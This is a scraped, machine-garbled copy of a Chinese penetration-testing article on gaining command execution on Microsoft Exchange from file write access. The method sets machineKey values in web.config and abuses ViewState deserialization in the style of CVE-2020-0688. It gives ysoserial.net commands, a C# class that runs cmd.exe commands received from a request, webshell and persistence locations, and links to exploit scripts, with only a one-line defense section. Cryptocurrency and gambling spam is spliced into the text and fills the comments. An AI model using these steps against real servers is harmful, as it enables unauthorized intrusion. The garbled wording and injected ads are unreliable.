U交所(www.payusdt.vip)是使用TRC-20协议的Usdt官方交易所,开放USDT帐号注册、usdt小额交易、usdt线下现金交易、usdt实名不实名交易、usdt场外担保交易的平台。免费提供场外usdt承兑、低价usdt渠道、Usdt提币免手续费、Usdt交易免手续费。U交所开放usdt otc API接口、支付回调等接口。
0x00 前言
在现实的渗透测试历程中,我们会遇到种种差其余环境,例如获得了Exchange服务器的文件读写权限,然则无法执行下令。
本文将要提供一种实现方式,剖析行使思绪,先容剧本开发的细节,给出防御建议。
0x01 简介
本文将要先容以下内容:
· 解决思绪
· 行使方式
· 程序实现
· 防御建议
0x02 解决思绪
1.通例解决思绪
(1)写入Webshell
通常选择以下两个位置:
· %ExchangeInstallPath%\FrontEnd\HttpProxy\owa\auth
· %ExchangeInstallPath%\FrontEnd\HttpProxy\ecp\auth
选择这两个位置的优点是可以直接接见Webshell。
也可以选择其他位置,例如%ExchangeInstallPath%\ClientAccess\ecp\,写入的文件名称有限制,下令规则可参考%ExchangeInstallPath%\ClientAccess\ecp\web.config。
注:
接见%ExchangeInstallPath%\ClientAccess\下的webshell需要添加正当用户的登录Cookie。
总的来说,通过写入Webshell的方式对照直接,然则Exchange服务器有可能禁用了下令执行权限或是阻挡系统函数的挪用,依旧无法获得下令执行权限。
(2)写入PE文件
写入exe文件,可选择以下两种启动文件夹:
· 系统启动文件夹的位置:%ProgramData%\Microsoft\Windows\Start Menu\Programs\Startup
· 用户启动文件夹的位置:%USERPROFILE%\Appdata\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
写入dll文件,可选择系统常见的dll挟制位置,例如c:\Windows\System32\fxsst.dll,更多细节可参考:https://github.com/3gstudent/Pentest-and-Development-Tips/blob/master/README-en.md,method-16-windows-fax-dll-injection
总的来说,通过写入PE文件的方式对照被动,需要守候系统加载,无法做到实时的下令执行。
2.有用的解决思绪
修改Exchange设置,设置MachineKey,通过.Net反序列化实现下令执行
可供学习的资料:
· http://www.zcgonvh.com/post/weaponizing_CVE-2020-0688_and_about_dotnet_deserialize_vulnerability.html
· https://blog.knownsec.com/2020/11/net-%e5%8f%8d%e5%ba%8f%e5%88%97%e5%8c%96%e4%b9%8b-viewstate-%e5%88%a9%e7%94%a8/
简朴来说,我们通过设置MachineKey,就能够实现与CVE-2020-0688同样的效果,也就是说,设置MachineKey为默认值后,可以直接使用CVE-2020-0688的行使工具实现下令执行。
0x03 行使方式
1.修改%ExchangeInstallPath%\ClientAccess\ecp\web.config
将:
修改为:
若是没有这一属性,那么就在system.web下添加:
接下来就可以直接使用CVE-2020-0688的行使工具,成熟的行使工具可选择:https://github.com/zcgonvh/CVE-2020-0688/,相比其它已开源的行使工具,这款工具能够实时获得下令执行效果,也支持加载shellcode的功效,其中的手艺细节值得深入研究。
注:
CVE-2020-0688的行使工具多数借助ysoserial.net的TextFormattingRunProperties实现下令执行,无法实时获得下令执行效果。
ysoserial.net-1.32的ActivitySurrogateSelectorFromFile能够通过Assembly.Load加载.Net程序集实现返回下令执行的效果,然则兼容性不够,无法做到支持所有版本的.Net环境。
zcgonvh开源的CVE-2020-0688行使工具解决了ysoserial.net-1.32中ActivitySurrogateSelectorFromFile兼容性的问题,同时对通讯数据做了AES加密。
ysoserial.net-1.33修复了ActivitySurrogateSelectorFromFile兼容性的bug,bug由zcgonvh修复。
我们知道,CVE-2020-0688的行使条件是需要掌握一个正当用户的凭证,而我们只获得了Exchange服务器的文件读写权限,还无法立刻获得正当用户的凭证,这里可以使用接下来的两种方式绕过这个限制。
(1)修改%ExchangeInstallPath%\FrontEnd\HttpProxy\owa\web.config
这里validationKey和decryptionKey可以随便指定,字符局限为十六进制,即0~F。
也可以选用以下算法:
· MD5
· AES
· HMACSHA256
· HMACSHA384
· HMACSHA512
密钥长度需要相符算法要求,学习资料:
https://devblogs.microsoft.com/aspnet/cryptographic-improvements-in-asp-net-4-5-pt-1/
,,U交所(www.payusdt.vip)是使用TRC-20协议的Usdt官方交易所,开放USDT帐号注册、usdt小额交易、usdt线下现金交易、usdt实名不实名交易、usdt场外担保交易的平台。免费提供场外usdt承兑、低价usdt渠道、Usdt提币免手续费、Usdt交易免手续费。U交所开放usdt otc API接口、支付回调等接口。
(2)修改%ExchangeInstallPath%\FrontEnd\HttpProxy\ecp\web.config
方式同上。
对于这两个位置的.Net反序列化下令执行,不再需要正当用户的凭证,以是行使程序也需要做修改。下面先容三种行使程序实现的细节。
0x04 实现细节
1.盘算VIEWSTATEGENERATOR的两种方式
Exchange的.Net反序列化用的是ViewState,其中必备的参数为VIEWSTATEGENERATOR,例如Python实现的CVE-2020-0688行使工具中使用的默认VIEWSTATEGENERATOR为B97B4E27,示意的页面为ecp/default.aspx,对应的ysoserial.net的参数为--path="/ecp/default.aspx" --apppath="/ecp/"
下面先容两种盘算VIEWSTATEGENERATOR的方式:
C,实现的代码如下:
using System; class a { static void Main(string[] args) { int hashcode = StringComparer.InvariantCultureIgnoreCase.GetHashCode("/ecp"); uint _clientstateid=(uint)(hashcode +StringComparer.InvariantCultureIgnoreCase.GetHashCode("default_aspx")); Console.WriteLine(_clientstateid.ToString("X2")); } }
得出效果为B97B4E27。
注:
代码来自http://www.zcgonvh.com/post/weaponizing_CVE-2020-0688_and_about_dotnet_deserialize_vulnerability.html
也可以通过网页自动盘算,方式如下:
在现实测试环境中,修改ecp/default.aspx的内容如下:
通过浏览器接见该页面,返回效果中的__VIEWSTATEGENERATOR即为盘算后的效果。
2.不需要正当用户凭证的三种反序列化程序实现。
(1)借助ysoserial.net的TextFormattingRunProperties实现下令执行的Python代码。
CVE-2020-0688中对应ysoserial.net的参数花样如下:
ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "{command}" --validationalg="SHA1" --validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --generator="{generator}" --viewstateuserkey="{}"
由于我们的行使不需要正当用户的凭证,新的ysoserial.net参数花样为:
ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "{command}" --validationalg="SHA1" --validationkey="{key}" --generator="{generator}"
参数说明如下:
· {command}对应我们要执行的下令
· {key}对应我们设置的validationKey
· {generator}对应要接见页面的VIEWSTATEGENERATOR
借助ysoserial.net的TextFormattingRunProperties天生最终的VIEWSTATE数据后,拼接成以下花样:
https://{url}?__VIEWSTATEGENERATOR={generator}&__VIEWSTATE={out_payload}
发送GET数据包即可。
下面举例举行说明:
选择Exchange默认的错误页面:%ExchangeInstallPath%\FrontEnd\HttpProxy\owa\auth\errorFE.aspx
owa\auth\errorFE.aspx对应的VIEWSTATEGENERATOR为042A94E8
借助ysoserial.net的TextFormattingRunProperties天生最终的VIEWSTATE数据。
最终接见的URL为:https://
完整的实现代码已上传至github,地址如下:
https://github.com/3gstudent/Homework-of-Python/blob/master/ExchangeDeserializeShell-NoAuth-TextFormattingRunProperties.py
代码支持两个位置的反序列化执行,划分为默认存在的文件%ExchangeInstallPath%\FrontEnd\HttpProxy\owa\auth\errorFE.aspx和%ExchangeInstallPath%\FrontEnd\HttpProxy\ecp\auth\TimeoutLogout.aspx
注:
由于我们已获得了Exchange服务器的文件读写权限,这里可以将代码效果输出至指定文件举行查看,下令示例:net user /domain >c:\test.txt
(2)借助ysoserial.net的ActivitySurrogateSelectorFromFile实现下令执行并返回执行效果的Python代码。
这里使用ysoserial.net的版本需要高于1.32,以阻止ActivitySurrogateSelectorFromFile兼容性的bug。
新建文件ExploitClass.cs,内容如下:
class E { public E() { System.Web.HttpContext context = System.Web.HttpContext.Current; context.Server.ClearError(); context.Response.Clear(); try { System.Diagnostics.Process process = new System.Diagnostics.Process(); process.StartInfo.FileName = "cmd.exe"; string cmd = context.Request.Form["cmd"]; process.StartInfo.Arguments = "/c " + cmd; process.StartInfo.RedirectStandardOutput = true; process.StartInfo.RedirectStandardError = true; process.StartInfo.UseShellExecute = false; process.Start(); string output = process.StandardOutput.ReadToEnd(); context.Response.Write(output); } catch (System.Exception) {} context.Response.Flush(); context.Response.End(); } }
注:
代码引用自https://devco.re/blog/2020/03/11/play-with-dotnet-viewstate-exploit-and-create-fileless-webshell/
更多用法可参考https://github.com/pwntester/ysoserial.net/blob/master/ExploitClass/ExploitClass.cs
ysoserial.net的参数花样如下:
ysoserial.exe -p ViewState -g ActivitySurrogateSelectorFromFile -c "ExploitClass.cs;System.Web.dll;System.dll;" --validationalg="SHA1" --validationkey="{key}" --generator="{generator}
借助ysoserial.net的ActivitySurrogateSelectorFromFile天生最终的VIEWSTATE数据后,组织POST数据包,添加名为cmd的参数,参数值为要执行的下令。
高版本的.NET Framework会阻止ActivitySurrogateSelector,可借助ysoserial.netActivitySurrogateDisableTypeCheck举行绕过,对应的参数花样如下:
ysoserial.exe -p ViewState -g ActivitySurrogateDisableTypeCheck -c "ignore" --validationalg="SHA1" --validationkey="{key}" --generator="{generator}"
完整的实现代码已上传至github,地址如下:
· https://github.com/3gstudent/Homework-of-Python/blob/master/ExchangeDeserializeShell-NoAuth-ActivitySurrogateSelectorFromFile.py
代码支持两个位置的反序列化执行,划分为默认存在的文件%ExchangeInstallPath%\FrontEnd\HttpProxy\owa\auth\errorFE.aspx和%ExchangeInstallPath%\FrontEnd\HttpProxy\ecp\auth\TimeoutLogout.aspx
代码能够执行下令并获得下令执行的效果,通过POST方式以参数__Value发送数据,通讯数据接纳逐字符异或加密。
(3)基于https://github.com/zcgonvh/CVE-2020-0688/实现无凭证行使的C,代码
VIEWSTATE数据的天生历程同https://github.com/zcgonvh/CVE-2020-0688/保持一致,只需要将validationkey作为变量传入即可。
%ExchangeInstallPath%\FrontEnd\HttpProxy\owa\web.config和%ExchangeInstallPath%\FrontEnd\HttpProxy\ecp\web.config均没有限制POST请求,以是在行使上不再需要写入空文件,可以直接天生最终的VIEWSTATE数据并通过POST的方式发送数据。
完整的实现代码已上传至github,地址如下:
· https://github.com/3gstudent/Homework-of-C-Sharp/blob/master/SharpExchangeDeserializeShell-NoAuth-Fromzcgonvh.cs
代码支持两个位置的反序列化执行,划分为默认存在的文件%ExchangeInstallPath%\FrontEnd\HttpProxy\owa\auth\errorFE.aspx和%ExchangeInstallPath%\FrontEnd\HttpProxy\ecp\auth\TimeoutLogout.aspx
支持的功效同https://github.com/zcgonvh/CVE-2020-0688/保持一致。
0x05 防御检测
在Exchange服务器被入侵后,不仅需要查杀有无可疑的Webshell,同样需要判断web.config中的machineKey是否被修改。
0x06 小结
本文提供了一种从Exchange文件读写权限到下令执行的实现方式,剖析行使思绪,先容三种行使剧本的开发细节,给出防御建议。
:
网友评论
9条评论usdt法币交易平台
回复U担保U担保(www.Uotc.vip)是使用TRC-20协议的Usdt官方交易所,开放USDT帐号注册、usdt小额交易、usdt线下现金交易、usdt实名不实名交易、usdt场外担保交易的平台。免费提供场外usdt承兑、低价usdt渠道、Usdt提币免手续费、Usdt交易免手续费。U担保开放usdt otc API接口、支付回调等接口。本沙雕来了~
皇冠足球app
回复@usdt法币交易平台
文很美丽手机新2管理端
回复菜宝钱包(caibao.it)是使用TRC-20协议的Usdt第三方支付平台,Usdt收款平台、Usdt自动充提平台、usdt跑分平台。免费提供入金通道、Usdt钱包支付接口、Usdt自动充值接口、Usdt无需实名寄售回收。菜宝Usdt钱包一键生成Usdt钱包、一键调用API接口、一键无实名出售Usdt。太好看了,看了一天
usdt支付对接(www.caibao.it)
回复澳洲幸运5(a55555.net)
回复怎么购买USDT(www.usdt8.vip)
回复@澳洲幸运5(a55555.net)
对得起我时间usdt法币交易平台(www.usdt8.vip)
回复@怎么购买USDT(www.usdt8.vip) 尤其是当她穿上旗袍的那一刹那,周围的景都失去了颜色,那一对傲人丰满的双峰,紧俏的蜜桃臀被勾勒而出,十分勾人。别说是男生了,要是女生见了都忍不住多看几眼。因此,才25岁的小姐姐就在车模圈有了一个美称——“第一美腿车模”。我要当免费推广!!
皇冠会员登录线路(www.hg9988.vip)
回复@usdt法币交易平台(www.usdt8.vip) 我要给你天天赞
usdt交易(www.usdt8.vip)
回复每经记者:毕陆名 每经编辑:王晓波经夸吗?我来了!!